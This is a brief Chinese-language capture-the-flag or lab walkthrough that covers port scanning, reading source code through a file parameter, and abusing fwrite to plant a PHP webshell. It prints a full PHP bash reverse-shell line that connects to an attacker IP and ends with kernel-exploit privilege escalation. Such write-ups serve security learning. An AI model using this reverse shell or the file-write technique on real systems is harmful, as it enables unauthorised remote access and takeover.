信息收集

主机探测

扫端口

80，81都是http

81的是需要登录的

扫80的网页

文件读取

发现graffiti.php

有文本可以输入,抓包

看到file=graffiti.txt

猜测可以读取源码

改为graffiti.php可以看到源码

写马

有fwrite函数能将file的值作为文件名可以创建并将message写入file的文件

写个木马可以看到成功

写个bash反弹弹到攻击机上

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.184.128/1234 0>&1'"); ?>

反弹成功

渗透提权

弹成功后找flag

这里说图片有信息

binwalk分离后是zlib隐写,不会

内核提权

尝试直接提权

上传探针探测内核漏洞

将exp传上去运行提权成功